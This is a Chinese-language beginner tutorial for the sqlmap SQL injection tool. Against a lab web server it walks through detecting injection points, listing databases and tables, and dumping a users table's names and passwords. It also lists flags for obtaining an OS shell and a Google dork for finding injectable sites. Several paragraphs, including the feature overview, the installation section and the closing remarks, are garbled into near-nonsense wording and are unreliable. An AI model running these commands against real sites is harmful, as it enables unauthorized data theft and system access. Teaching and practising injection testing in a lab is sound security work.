1 SQLMap简介

SQLMap 是一个自动化的SQL注入工具，其主要功能是扫描、发现并利用给定URL的SQL注入漏洞，内置了很多绕过插件，支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。

注意：sqlmap只是用来检测和利用sql注入点，并不能扫描出网站有哪些漏洞，使用前请先使用扫描工具扫出sql注入点。

SQLMap采用了以下5种独特的SQL注入技术。
? 基于布尔类型的盲注，即可以根据返回页面判断条件真假的注入。
? 基于时间的盲注，即不能根据页面返回的内容判断任何信息，要用条件语句查看时间延迟语句是否己执行（即页面返回时间是否增加）来判断。
? 基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回到页面中。
? 联合查询注入，在可以使用Union 的情况下的注入。. 堆查询注入，可以同时执行多条语句时的注入。

SQLMap 的强硬的郊果模块收录参数库指纹图辨识、参数库枚举、参数导出、采访方向压缩文件操控系统，并在得彻底的操控授权管理时并推行无数个ps命令。SQLMap的郊果模块强硬到令人惊羡，当一般的添加APP不能够根据SQL添加系统漏洞实施添加时，在使用SQLMap产生意想不来的郊果。

2 SQLMap安装

SQLMap的装配玩法能够 她宽带上网找寻，本教学是凭借KaliLinux上预装软件卸载的SQLMap方式来进行相应的學習与实验报告，不必她标准配置python等基础理论氛围，较简单易使用，怎么在一个机中装配KaliLinux操作体统请察看《【Linux操作体统】第2节 一个机中装配Kali操作体统》。

3 sqlmap的简单使用

3.1 常用命令及参数

观察sqlmap的操作命令字鼓励手则

-u  "url"		#检测注入点
--dbs			#列出所有数据库的名称
--current-db	#列出当前数据库的名称
-D				#指定一个数据库
--table			#列出所有表名
-T				#指定表名
--columns		#列出所有字段名
-C				#指定字段
--dump			#列出字段内容

post注入
-r xxx.txt #xxx.txt为http数据包

–cookie #指定cookie
–os-shell #获取shell
sqlmap -g “inurl:php?id=” #利用google自动搜索注入点

3.2 具体操作实例

3.2.1 操作前准备

实验靶场——虚拟机（IP为172.16.1.1）：本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站，win2008及phpstudy的安装过程可以参考《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》，网站的搭建过程可以参考《【(SQL+HTML+PHP)综合】一个简单论坛网站的综合开发案例》

注入工具——kali虚拟机，自带sqlmap工具

要留意，win2008和kali桥接入同时VMnet下。这两种能能共同ping通。

3.2.2 具体实例

3.2.2.1 实例1：查看帮助手册

sqlmap -h

3.2.2.2 实例2：检测注入点及注入类型

sqlmap -u "//172.16.1.1/PHP/jrltbbs/showmessage.php?id=5"

当SQLMap执行该命令时，它会执行以下步骤：

1）判断可注入的参数；2）判断可以用哪种SQL注入技术来注入；3）识别出哪种数据库；4）根据用户选择，读取哪些数据。

3.2.2.3 实例3：列出所有数据库的名字

sqlmap -u "//172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --dbs

3.2.2.4 实例4：列出当前数据库的名字

sqlmap -u "//172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --current-db

3.2.2.5 实例5：列出某数据库的所有表名

sqlmap -u "//172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' --tables

3.2.2.6 实例6：列出某表中的所有字段名

sqlmap -u "//172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' --columns

3.2.2.7 实例7：列出某字段中的所有字段内容

sqlmap -u "//172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' -C 'name,password' --dump

3.2.2.8 实例8：post注入

首先利用burpsuite抓到使用post请求方法的http请求数据包，将该包保存为post.txt文件（保存在当前目录下）。输入代码：sqlmap -r post.txt，会自动读取http数据包来做个post注入的测试

在本特刊blog中，重点以入门级知识与技能主，带领零的基础的盟友知晓部分工具工具的很简洁进行，会分享赚钱sqlmap的很简洁施用技巧，词有：施用该工具来鉴别目的企业网站是否能够现实存在进入、查询网调用数据新信息库的库名表称呼段名以其字段名网站内容等新信息.其他更详细说明的妙用可详细sqlmap的帮到指南，如-level、-referer、roles等。

4 参考文章及优秀资源推荐

《sqlmap 详解》
《 sqlmap 官网》
《sqlmap文档地址》